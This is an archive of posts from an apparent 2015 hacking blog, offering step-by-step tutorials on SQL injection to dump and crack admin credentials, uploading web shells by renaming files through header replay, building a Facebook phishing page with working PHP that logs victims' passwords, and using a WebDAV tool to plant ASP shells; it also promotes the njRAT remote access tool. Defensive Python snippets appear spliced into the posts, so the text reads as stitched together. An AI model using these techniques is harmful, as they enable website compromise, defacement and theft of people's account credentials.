
Friday, 27 February 2015

Uploading Web Shells using Live HTTP Headers

Following the previous post, once you have successfully exploited an SQLi vulnerability and dumped the database for a particular website, you will probably want to do more than just log in to an administrative control panel. It’s no secret, yet somehow many people simply do not know what to do with a website once they have compromised the database and gained admin credentials to the control panel (phpMyAdmin, webstore, etc.). Today I will tell you how to upload a web shell through the use of HTTP header manipulation.
Many administrative or user panels allow you to upload images for use as an avatar or for use in a gallery, etc. Attempting to upload anything that does not have an image file extension (.jpg, .bmp, .gif, etc) is typically rejected. This is obviously a problem if you are interested in uploading your own files or shells, which is where this guide can prove to be a valuable resource.
Requirements: 

(Uploading Web Shells using Live HTTP Headers) Tutorial:
  1. Login to the compromised site as an admin (using the credentials you dumped from the SQL database), then find a place to upload a file in that particular site. (Typically an image upload form)
  2. Then rename your shell to shell.php.jpg (or whatever that site supports; in most cases, the upload form will tell you what file types are acceptable). For simplicity in this tutorial, I have renamed it to shell.php.jpg.
  3. Start the Live HTTP Headers add-on by clicking “Tools” in the Firefox menu bar and selecting Live HTTP Headers from the drop-down list.
  4. Upload your shell (shell.php.jpg) in the browser using the upload form.
  5. You should now see something similar to this in Live HTTP Headers:
  6. In the Live HTTP Headers window, locate and click on the “shell.php.jpg” text.
  7. Click on the Replay button.
  8. A new window will open, in that window there will be two boxes.
  9. In the bottom box, find the name of your shell (shell.php.jpg) and rename it to shell.php and click the Replay button again.

Determine where the image uploading form is storing the uploaded files, typically done by finding a legitimate image uploaded with the form, and right clicking on it to view its properties. For example, say the form uploads images to a folder called ‘images’. You right click your avatar image and determine that the uploading form stores the images in the ‘www.example.com/images/’ folder. This is where your shell will be located. We can access our shell by navigating our browser to www.example.com/images/shell.php.
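The replay step above only works when the server stores the file under the name the request carries. The following is an added example, not code from the original post, contrasting that weak pattern with a handler that ignores the client filename; the function names, signature table and sample bytes are assumptions made for illustration.

```python
import secrets

# Magic-byte signatures for the image types this hypothetical form accepts.
SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}

# Constructed sample bodies (not real files).
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SCRIPT_SAMPLE = b"<?php echo 'constructed sample'; ?>"


def weak_store_name(client_filename: str) -> str:
    """Weak pattern: the extension was only checked in the browser, so the
    server stores the upload under whatever name the request carries."""
    return client_filename


def safe_store_name(client_filename: str, content: bytes) -> str:
    """Return a server-chosen storage name, or raise ValueError.

    client_filename is used only in the error message. It never influences
    the stored name or extension, because it is the request field that is
    rewritten when the upload is replayed.
    """
    for magic, ext in SIGNATURES.items():
        if content.startswith(magic):
            return secrets.token_hex(16) + ext
    raise ValueError(f"rejected {client_filename!r}: not an accepted image type")


if __name__ == "__main__":
    print(weak_store_name("shell.php"))               # stored with a script extension
    print(safe_store_name("shell.php", JPEG_SAMPLE))  # random name ending in .jpg
```

A header check alone does not prove a file is harmless; what stops execution is the server-chosen extension, combined with an upload directory that the web server is configured never to run scripts from.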

SQL Injection | Step by Step deface website

What is SQL Injection?

SQL is Structured Query Language. This language is used to work on the database. Commands such as SELECT, INSERT, DELETE are used to update information in the database.
In this type of attack, we make use of a vulnerability wherein we supply our own commands to the website’s database and successfully deface it :D. This vulnerability occurs when the user’s input is not filtered or is improperly filtered.

 

Finding A Vulnerable Website

The first step is obviously finding a vulnerable website. There are a lot of ways to do so. The most common method of searching is by using dorks.
 

Dorks

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.
 

Using Dorks

Now basically what a dork does is uses Google’s “inurl” command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. 
NOTE: Don’t mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.
inurl:”products.php?prodID=”
inurl:buy.php?category=

Exploiting the vulnerability 

You have a vulnerable URL
www.something.com/news/news.php?id=130
OK, now how do you deface it?

Finding number of columns

Now put the following in the url
http://www.something.com/news/news.php?id=130 order by 10–
Now we told the database to order it by 10th column. Your job is to find how many columns are there in the table. So if order by 10 gave you an error, replace 10 by 9 and try it. Or if 10 gave a valid reply put 11 and try.
Also, the "--" (two dashes) at the end means “comment”. So anything after this statement is commented off and only our query is put in.
So assume I got error for order by 10, then I tried order by 9 and so on.. Finally I got no error at 6 and error at 7. Hence, the Table has 6 columns .

Find Vulnerable columns


Now we will use the union select all command to find a vulnerable column. Remember to make the ID number negative by putting a - in front of it. Like here, I have made it id=-130.
http://www.something.com/news/news.php?id=-130 union select all 1,2,3,4,5,6,–
Since it has 6 columns, we do select all 1,2,3,4,5,6 and a -- at the end.
This will give an output. Whichever column number comes out as bold in the output, that column is vulnerable. Just remember this column number. Assume I got 2 as the vulnerable column.

Finding tables


Now our job is to find the different tables in the database. We do the following:
http://www.something.com/news/news.php?id=-130 union select all group_concat(table_name),3,4,5,6 from information_schema.tables where  table_schema=database() –
Here group_concat(table_name) will give you all the table names in the database. information_schema holds information about the database. So we are just querying from that.

Finding Column names


Similarly get all the columns by simply replacing ‘table’ with ‘column’
http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()–
Now you will be able to find all the column names from all the tables. After all the columns from one table, there will be a “id” and then all columns from next table and so on.
If this doesn’t work then you can do
http://www.something.com/news/news.php?id=-130 union select all   1,group_concat(column_name),3,4,5,6 from information_schema.columns where  table_name=”some table you got from the previous step”–

Final Step

Now, in the list of columns, look for some interesting columns like username or password. So now you should know the table name and column names you want, e.g. the username and password columns from the tbl_admin table.
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin–
Now I just put the column names in the group_concat with 0x3a in between, which is ASCII for a colon, and tbl_admin is the table name where these columns are.
Now I got output something like
admin:”encrypted hash”,user2:”encrypted hash”, and so on…
So usernames are not encrypted here and passwords are encrypted.
So your job is almost done. Now you will get all the users and passwords. Usually the passwords will be encrypted in md5. You can decrypt it. Just use google :p
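Every request in this walkthrough depends on the id value being pasted into the SQL text. The following is an added example, not code from the original post, showing that pattern beside a parameterized query; sqlite3 stands in for the site's database, and the news schema, the sample rows and the constructed UNION_PAYLOAD are assumptions (only the tbl_admin table name comes from the text above).

```python
import sqlite3

# Constructed input in the style of the requests above.
UNION_PAYLOAD = "-130 UNION SELECT username, password FROM tbl_admin--"


def make_db() -> sqlite3.Connection:
    """Build a constructed in-memory database (sample data, not from the page)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE tbl_admin (username TEXT, password TEXT);
        INSERT INTO news VALUES (130, 'Constructed headline');
        INSERT INTO tbl_admin VALUES ('admin', 'constructed-hash');
    """)
    return db


def get_news_vulnerable(db: sqlite3.Connection, news_id: str) -> list:
    # Vulnerable: the id parameter is pasted into the SQL text, so any
    # ORDER BY / UNION fragment it carries becomes part of the statement.
    return db.execute(f"SELECT id, title FROM news WHERE id = {news_id}").fetchall()


def get_news_safe(db: sqlite3.Connection, news_id: str) -> list:
    # Hardened: reject anything that is not an integer, then bind the value
    # as a parameter so it can never change the structure of the query.
    try:
        value = int(news_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return db.execute("SELECT id, title FROM news WHERE id = ?", (value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(get_news_vulnerable(db, UNION_PAYLOAD))  # rows from tbl_admin leak out
    print(get_news_safe(db, "130"))                # only the requested news row
```

Binding alone is already enough to stop the injected text from being parsed as SQL; the integer check additionally turns malformed ids into a clean error instead of an empty result.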
 
 

Thursday, 26 February 2015

How To Hack Facebook With Phishing Page

  



As we all want to hack our friend facebook account,and want to read all his personal things.
Today i m gonna teach you how to hack a facebook account with a phishing page.

Phishing:



Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

 

 

steps to create a phishing page:
1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.




                                          
2. now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3. Now open the notepad and press CTRL+F,and type ACTION.


                                                  

                                           
4. You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5. Delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6. Now save it on your desktop with the name index.htm,not index.html,remember.

7. Now your phishing page is ready.it will look like a pic given below .



                                                   
8. Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9. You have two files now one is index.htm and another is post.php,remember file extension is important.

10. Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

11. I prefer u to use 000webhost because it will be easy to use.
                           
                                              

12. You have to make a account in that ,after that it looks like a picture given below.



                                                                          
13. Now go control pannel,then on file manager.

14. After that a new window will pop up.Now go to public_html.


                                           
                                        

15. Delete the file named default.php,after that upload two files index.htm and post.php one by        one .



                                        
16. Now the last step click on view of index.htm it will look same as facebook page.



                                         

17. Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18. Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                


                                        

19. Click on view now u will have your friend's password and email id.


                                           

20. This is a simple trick to hack any Facebook password account by phishing page.

21. If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.


                                     Click here to View a Video Tutorial ....


Note:

phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....





                                               
                                                        Thank You...
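The cloned page described in this post gives itself away through its login form, whose action no longer points at the real site. The following is an added example, not code from the original post, of a check a mail gateway or abuse desk could run on a reported page; the function name, the host lookalike.example and both HTML samples are constructed, and it assumes the page has already been identified as imitating a known brand.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed samples: a cloned form as described above, and a genuine one.
CLONE_HTML = ('<form action="post.php" method="post"><input name="email">'
              '<input type="password" name="pass"></form>')
GENUINE_HTML = ('<form action="https://www.facebook.com/login.php?login_attempt=1">'
                '<input type="password" name="pass"></form>')


class _LoginForms(HTMLParser):
    """Collect the action of every <form> that contains a password input."""

    def __init__(self):
        super().__init__()
        self._action = None   # action of the form currently open, if any
        self.actions = []     # actions of forms that hold a password field

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._action is not None and self._action not in self.actions:
                self.actions.append(self._action)

    def handle_endtag(self, tag):
        if tag == "form":
            self._action = None


def suspicious_login_targets(page_url: str, html: str, trusted_hosts: set) -> list:
    """Return resolved login-form targets whose host is not in trusted_hosts."""
    parser = _LoginForms()
    parser.feed(html)
    flagged = []
    for action in parser.actions:
        # A relative action such as "post.php" resolves to the hosting site.
        target = urljoin(page_url, action)
        host = (urlparse(target).hostname or "").lower()
        if host not in trusted_hosts:
            flagged.append(target)
    return flagged
```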
            
 

Saturday, 21 February 2015

Download Njrat New Version 0.7

Njrat is used for system hacking.

Download Windows 10 Technical Preview

 


Download: 32bit

Download: 64bit

Trick to Publish Audio Comments on Any Facebook Status Update

How to Publish Audio Comments/Messages on Fb

 

The trick is actually very simple and I will try my best to make you understand with simple steps. So let's get started.



Step 1: Open Google Chrome Browser. If you do not have it installed then Download > Install > Open.
Step 2: Now download and install the Talk and Comment extension from Google play store.


Step 3: If you have installed any extensions earlier, then Step 2 needs no explanation. Once the extension is successfully installed in your browser, it will automatically open a new tab where it will ask for your permission to use your mic. Click on Allow.
Step 4: The extension installation part is now complete, and the real fun begins. Log in to Facebook. You will see a mic icon added to your comment box and chat box. If you see it, you are on the right track.
Step 5: To publish your audio comment on your friend's Facebook status or to send them an audio message, simply click and hold that mic icon, then speak to record your comment/message.
Step 6: Once you are done with the recording part, simply release the mic icon to upload the audio. You will see a link; press Enter to publish your comment or send your audio message to your friend.
Step 7: Cross check by Clicking on Play icon to hear your recorded message/Comment which others will.

Hmei7 Webdav

Hmei7 WebDav

WebDAV is an old website vulnerability, but there are still websites that are vulnerable to it. I am sharing this tool for those who don't know about it yet. This tool automatically uploads an asp shell to the WebDAV-vulnerable website. If the site is not vulnerable, the tool will say it's not vulnerable.

How to use Hmei7 Rootkit?
  1. Open rootkit.exe, then click the WebDav menu button and click "asp shell maker".
  2. You will then be presented with a new window like the image below.
  3. Click Settings to view or supply your own asp shell; you can load the shell from a text file. The image above shows it all already.
  4. Click Add Site to add the webdav vulnerable website, then click Ok.
  5. Lastly, click "Serang !!!" to begin the process of hacking the website which is webdav vulnerable. You can tell whether the shell was injected from the report in the left portion of the tool.


Enjoy Webdaving! :3
Credits to Hmei7